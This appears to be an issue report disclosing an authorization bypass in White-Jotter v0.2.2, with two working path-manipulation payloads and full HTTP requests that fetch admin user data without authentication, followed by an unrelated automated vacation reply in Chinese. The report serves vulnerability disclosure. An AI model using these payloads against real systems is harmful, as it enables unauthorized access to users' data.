Authorization bypass

[gaogaostone]

White-Jotter v0.2.2 has an authorization bypass vulnerability, allowing unauthorized users to access sensitive system information and even modify critical system data. This vulnerability compromises the confidentiality, integrity of the system.

Proof of Concept

1. Visit the url http://x.x.x.x:8443/api/admin/user to get user information. Without cookie, it responses no data. The request and response are as following. It should be an authorized request.
   
2. Add “/xxx/..;/” in the head of the request path, aka the new url is http://x.x.x.x:8443/xxx/..;/api/admin/user. Although without cookie, it responses with user information. It bypasses the authentication.

GET /xxx/..;/api/admin/user HTTP/1.1
Host: x.x.x.x:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Origin: http://x.x.x.x:8080
Connection: keep-alive
Referer: http://x.x.x.x:8080/

3. We can also use this payload to bypass the authentication.

GET /api/;/admin/user HTTP/1.1
Host: x.x.x.x:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Origin: http://x.x.x.x:8080
Connection: keep-alive
Referer: http://x.x.x.x:8080/

[CFH-Steven]

这是来自QQ邮箱的假期自动回复邮件。   你好，你发的信息我已经收到，谢谢。